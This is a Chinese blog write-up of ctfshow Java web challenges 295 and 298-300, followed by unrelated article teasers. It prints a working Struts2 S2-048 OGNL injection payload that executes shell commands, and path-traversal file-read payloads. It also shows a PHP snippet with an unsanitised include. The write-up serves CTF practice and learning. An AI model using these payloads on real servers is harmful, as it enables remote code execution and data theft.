当前位置：首页 > news >正文

ctfshow web入门 java 295 298-300

news 2025/7/8 17:29:05

其他没啥好讲的，都是工具就通杀了

web295

漏洞地址 http://ip/S2-048/integration/saveGangster.action

这里我们可以看到他是解析了

尝试使用网上的payload

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

这里我们发现，他是解析了Runtime的，然后我们就可以利用它里面的方法执行命令

//这里我们无论是env，还是cat /proc/self/environ都有报错
payload：%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('env').getInputStream())).(#q)}

但是报错中的这个就是flag

web298

这里给我们了一个jar，打包好了的包，这里我们使用一些反编译工具查看一下

在loginServlet类中，我们看到这里经过这么判断才能获得flag，跟踪一下看看。

这里看到getVipStatus方法，获得了获取flag的条件就是user等于admin，password等于ctfshow

但是题目一进去就一个报错，看这里软件包里面有ctfshow，尝试一下目录ctfshow

得到提示通过login，传参username和password

payload：/ctfshow/login?username=admin&password=ctfshow

web299

查看源代码获得提示，这里可能存在任意文件读取，我们首先查看index.jsp，这里发现存在任意文件读取，这里我们继续读取WEB-INF/web.xml

这里我们看到，这里有一个软件包中有一个GetFlag类，这里我们去读取WEB-INF/classes/com/ctfshow/servlet/GetFlag.class去

虽然很乱，但是在这里发现了flag

payload: /view-source?file=../../../../../../fl3g

web300

<?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 10:52:43
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com*/if(isset($_GET['file'])){$file = $_GET['file'];include($file);
}else{highlight_file(__FILE__);
}

和上面差不多

payload: ?file=../../../../../f1bg

ctfshow web入门 java 295 298-300

其他没啥好讲的，都是工具就通杀了 web295 漏洞地址 http://ip/S2-048/integration/saveGangster.action 这里我们可以看到他是解析了尝试使用网上的payload %{(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess#dm):((#container#cont…...

编程日记 2023/5/19 6:09:17

SWIG包装器使用指南——（四）C#使用SWIG简介与实践

SWIG系列：http://t.csdn.cn/cIAcr 文章目录一、简介二、全局函数、变量、常量三、继承四、传递指针、引用、数组与值五、基本类型的指针与引用六、基本类型的数组七、基本类型的默认map规则八、常用的typemap方法九、代码插入十、实践10.1 如何映射Foo*&到ref F…...

编程日记 2023/5/25 16:07:08

HashTable, HashMap 和 ConcurrentHashMap

HashTable, HashMap 和 ConcurrentHashMap 都是 Java 集合框架中的类，用于存储和操作键值对。它们之间存在一些关键区别，如下所示： 1.同步性： HashTable：线程安全，所有的方法都是同步的（synchr…...

编程日记 2023/5/18 11:32:44

ToBeWritten之IoT 技战法

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…...

编程日记 2023/5/29 5:59:59

基于ASP.NET开发的医院手术麻醉信息管理系统源码项目源码

系统主要功能介绍： 门诊科室管理系统：手术快速申请、手术申请、手术审核麻醉科管理系统：手术安排、术后处方、术后小结、PCS实施及管理记录、手术流程手术护理系统：手术安排、安排临时手术、添加急诊手术、局麻手术护理、整体护…...

编程日记 2023/5/20 3:08:46

伪加密超具体破解办法，直击原理底层，细致演示！！！

前言： 由于我自己目前在misc和取证工作中，也遇到很多压缩包的问题，我个人非常喜欢做压缩包的题目，但也会遇到伪加密问题难以破解，全网ctf教程我都看完了，但是都觉得不够具体，所以我写一篇博客&…...

编程日记 2023/5/29 6:01:44

ChatGPT大规模封锁亚洲地区账号

我是卢松松，点点上面的头像，欢迎关注我哦！ 在毫无征兆的情况下，从3月31日开始OpenAI大规模封号，而且主要集中在亚洲地区，特别是ip地址在台湾、日本、香港三地的，命中率目测40%。新注册的账号、…...

编程日记 2023/5/30 9:09:36

脂肪酸脂质Myristic acid PEG NHS，Myristic-acid PEG NHS ester，肉豆蔻酸PEG活性酯，具有优异疏水性

一、基础产品数据： 中文名：肉豆蔻酸PEG N-羟基琥珀酰亚胺，肉豆蔻酸PEG活性酯英文名：Myristic acid PEG NHS，Myristic-acid PEG NHS ester，Myristic acid PEG SE 结构式（Structural）…...

编程日记 2023/5/25 16:07:56

MFC - CFormView类学习1

CFormView简介 MFC提供了一个名为CFormView的特殊视图类，我们称其为表单视图。表单视图是指用控件来输入和输出数据的视图，用户可以方便地在表单视图中使用控件。表单视图具有对话框和滚动视图的特性，它使程序看起来象是一个具有滚动条的对话…...

编程日记 2023/5/17 6:32:13

图像预处理方法

图像预处理膨胀腐蚀概述 ⚫ 膨胀、腐蚀属于形态学的操作, 简单来说就是基于形状的一系列图像处理操作 ⚫ 膨胀腐蚀是基于高亮部分(白色)操作的, 膨胀是対高亮部分进行膨胀, 类似“领域扩张”, 腐蚀是高亮部分被腐蚀, 类似“领域被蚕食” ⚫ 膨胀腐蚀的应用和功能: 消除噪声…...

编程日记 2023/5/20 8:26:32

【蓝桥杯C/C++】专题六：动态规划

专题六：动态规划目录专题六：动态规划导读什么是动态规划解决的问题解题步骤动态规划应该如何debug记忆化搜索斐波那契数题目代码题解爬楼梯题目代码题解使用最小花费爬楼梯题目代码题解不同路径题目题解dfsdp凑硬币题目题解dfsdp滑雪题目代码题解汉罗塔…...

编程日记 2023/5/18 5:20:04

图的定义和基本术语

图的定义和基本术语1.图的定义2.图的基本术语3.图的分类1.图的定义图是由顶点和有穷非空集合和顶点边的集合吗，表示为G(V,E)。 G表示一个图，V是图G的顶点（数据元素）的集合，E是图G中顶点之间边的集合。在图中&#xf…...

编程日记 2023/5/28 19:27:43

041：cesium加载Blue Marble地图

第041个点击查看专栏目录本示例的目的是介绍如何在vue+cesium中加载Blue Marble地图。Blue Marble是一个术语，用来描述星球漂浮在浩瀚太空中的形象。早在 1972 年，阿波罗 17 号任务的工作人员就首次捕捉到了地球的标志性卫星图像，并将其称为“Blue Marble”。从那时起，NA…...

编程日记 2023/5/26 20:38:06

【概念梳理】激活函数

一、引言常用的激活函数如下： 1、Sigmoid函数 2、Tanh函数 3、ReLU函数 4、ELU函数 5、PReLU函数 6、Leaky ReLU函数 7、Maxout函数 8、Mish函数二、激活函数的定义多层神经网络中，上层节点的输出和下层节点的输入之间具有一个函数关系，…...

编程日记 2023/5/29 6:02:57

【python】@property 和 @staticmethod

property 和 staticmethod 是 Python 中的两个装饰器，它们分别用于在类中创建属性或静态方法。它们的作用如下： property property：用于将类的一个方法作为属性访问。在 Python 中，使用“getter” 和“setter”方法来实现属性&a…...

编程日记 2023/5/25 16:09:05

Spring题集 - Spring AOP相关面试题总结

文章目录01. Spring AOP 的理解?02. Spring AOP 思想的代码实现03. Spring AOP 的相关术语有哪些？04. Spring AOP 基于注解的切面实现？05. Spring AOP 的通知有哪些类型？06. AOP 有哪些实现方式？07. Spring AOP 和 AspectJ AOP 有…...

编程日记 2023/5/24 2:04:32

分考场

[蓝桥杯 2017 国 C] 分考场(假题：最小色数) 题目描述 nnn 个人参加某项特殊考试。为了公平，要求任何两个认识的人不能分在同一个考场。求最少需要分几个考场才能满足条件。输入格式第一行，一个整数 n(1<n<100)n(1<n<100…...

编程日记 2023/5/30 9:10:50

BI技巧丨DAX Studio

DAX Studio DAX Studio，作为PowerBI外部插件使用率排名第一的插件，相信各位小伙伴或多或少都听说过，那么DAX Studio具体有哪些功能呢？ PS：DAX Studio的下载链接，小伙伴们可以自行搜索，这里就不…...

编程日记 2023/5/21 10:57:00

Java 8常用时间 API

Date: 你不爱我了吗? 🚡本地时间时区相关格式化在Java 8中，Instant类用于表示时间戳，相当于旧的Date类；LocalDateTime类用于表示日期和时间，相当于旧的Calendar类；DateTimeFormatter类用于格式化日期和时间…...

编程日记 2023/5/20 9:17:38

C++运算符

C运算符运算符是一种告诉编译器执行特定的数学或逻辑操作的符号。C 内置了丰富的运算符，并提供了以下类型的运算符： 算术运算符关系运算符逻辑运算符位运算符赋值运算符杂项运算符 1. 算术运算符运算符描述实例把两个操作数相加A B 将得到 30-从第…...

编程日记 2023/5/22 21:00:31

【WiFi帧结构】

文章目录帧结构MAC头部管理帧帧结构 Wi-Fi的帧分为三部分组成：MAC头部frame bodyFCS，其中MAC是固定格式的，frame body是可变长度。 MAC头部有frame control，duration，address1，address2，addre…...

编程新知 2025/7/7 14:56:19

Admin.Net中的消息通信SignalR解释

定义集线器接口 IOnlineUserHub public interface IOnlineUserHub {/// 在线用户列表Task OnlineUserList(OnlineUserList context);/// 强制下线Task ForceOffline(object context);/// 发布站内消息Task PublicNotice(SysNotice context);/// 接收消息Task ReceiveMessage(…...

编程新知 2025/7/6 2:27:06

8k长序列建模，蛋白质语言模型Prot42仅利用目标蛋白序列即可生成高亲和力结合剂

蛋白质结合剂（如抗体、抑制肽）在疾病诊断、成像分析及靶向药物递送等关键场景中发挥着不可替代的作用。传统上，高特异性蛋白质结合剂的开发高度依赖噬菌体展示、定向进化等实验技术，但这类方法普遍面临资源消耗巨大、研发周期冗长…...

编程新知 2025/7/8 17:28:20

解决Ubuntu22.04 VMware失败的问题 ubuntu入门之二十八

现象1 打开VMware失败 Ubuntu升级之后打开VMware上报需要安装vmmon和vmnet，点击确认后如下提示最终上报fail 解决方法内核升级导致，需要在新内核下重新下载编译安装查看版本 $ vmware -v VMware Workstation 17.5.1 build-23298084$ lsb_release…...

编程新知 2025/7/7 16:21:08

页面渲染流程与性能优化

页面渲染流程与性能优化详解（完整版） 一、现代浏览器渲染流程（详细说明） 1. 构建DOM树浏览器接收到HTML文档后，会逐步解析并构建DOM（Document Object Model）树。具体过程如下： (…...

编程新知 2025/7/8 6:26:33

华为OD机试-食堂供餐-二分法

import java.util.Arrays; import java.util.Scanner;public class DemoTest3 {public static void main(String[] args) {Scanner in new Scanner(System.in);// 注意 hasNext 和 hasNextLine 的区别while (in.hasNextLine()) { // 注意 while 处理多个 caseint a in.nextIn…...

编程新知 2025/7/7 6:49:47

Android Bitmap治理全解析：从加载优化到泄漏防控的全生命周期管理

引言 Bitmap（位图）是Android应用内存占用的“头号杀手”。一张1080P（1920x1080）的图片以ARGB_8888格式加载时，内存占用高达8MB（192010804字节）。据统计，超过60%的应用OOM崩溃与Bitm…...

编程新知 2025/6/22 8:50:50

Linux --进程控制

本文从以下五个方面来初步认识进程控制： 目录进程创建进程终止进程等待进程替换模拟实现一个微型shell 进程创建在Linux系统中我们可以在一个进程使用系统调用fork()来创建子进程，创建出来的进程就是子进程，原来的进程为父进程。…...

编程新知 2025/7/7 7:10:35

关于uniapp展示PDF的解决方案

在 UniApp 的 H5 环境中使用 pdf-vue3 组件可以实现完整的 PDF 预览功能。以下是详细实现步骤和注意事项： 一、安装依赖安装 pdf-vue3 和 PDF.js 核心库： npm install pdf-vue3 pdfjs-dist二、基本使用示例 <template><view class"con…...

编程新知 2025/7/8 0:02:00

华为OD最新机试真题-数组组成的最小数字-OD统一考试（B卷）

题目描述给定一个整型数组，请从该数组中选择3个元素组成最小数字并输出 (如果数组长度小于3，则选择数组中所有元素来组成最小数字)。输入描述行用半角逗号分割的字符串记录的整型数组，0<数组长度<= 100，0<整数的取值范围<= 10000。输出描述由3个元素组成…...

编程新知 2025/6/20 15:28:23

web295

web298

web299

web300

相关文章：